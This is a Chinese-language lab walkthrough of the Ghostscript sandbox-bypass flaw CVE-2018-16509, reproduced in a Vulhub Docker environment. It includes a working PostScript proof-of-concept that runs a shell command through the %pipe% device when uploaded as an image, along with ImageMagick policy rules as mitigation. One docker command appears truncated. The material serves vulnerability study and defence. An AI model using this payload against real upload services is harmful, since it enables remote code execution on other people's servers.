GhostScript 沙箱绕过(命令执行)漏洞
一.漏洞介绍
(一)编号
CVE-2018-16509
(二)概述
Ghostscript 是一套基于 Adobe、PostScript 及可移植文档格式(PDF)的页面描述语言等而编译成的免费软件。
Ghostscript 可以查看及打印 PS、EPS、PDF 文件,支持 PS 的绘图程序一般都很大
以Postscript和PDF阅览器使用的栅格化影像处理器RIP引擎,GhostScript 被许多图片处理库所使用。
(三)适用条件
在文件上传过程中,有可能会用GhostScript来处理图片。所以在上传图片点可以试一下它是否存在这个漏洞。在处理/invalidaccess异常时,程序没有正确的检测‘restoration of privilege(权限恢复)’。攻击者可通过提交特制的PostScript利用该漏洞执行代码。
(四)影响版本
Ghostscript 9.24之前版本
二.操作步骤
(一)Vulhub
文件位于:/home/vulhub/vulhub-master/ghostscript/CVE-2018-16509
Ip:192.168.126.136
1.环境搭建 docker-compose build和docker-compose up -d
2.检查docker是否开启 docker-compose ps
(二)Windows
1.登录 https://192.168.126.133:8080/upload.php
2.尝试上传poc.png
源码:
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%touch /tmp/CVE-2018-16509_is_success) currentdevice putdeviceprops
(三)vulhub
1.在漏洞环境下进入容器 输入docker-compose exec web bash
2.输入ls /tmp/ 看到success文件已经创建
3.使用攻击命令
docker run -it --rm --name im -v id/poc.png:/poc.png vulhub/imagemagick:7.0.8 c
攻击执行成功
三.漏洞防护
漏洞信息可以参考imagemaick的ghost script RCE漏洞
目前最全的修复方案参考https://www.kb.cert.org/vuls/id/332928
编辑ImageMagick的policy文件,默认路径为/etc/ImageMagick/policy.xml
在标签中增加如下内容
<policy domain="coder" rights="none" pattern="PS" />
<policy domain="coder" rights="none" pattern="PS2" />
<policy domain="coder" rights="none" pattern="PS3" />
<policy domain="coder" rights="none" pattern="EPS" />
<policy domain="coder" rights="none" pattern="PDF" />
<policy domain="coder" rights="none" pattern="XPS" />
参考文章https://www.cnblogs.com/kbhome/p/13210431.html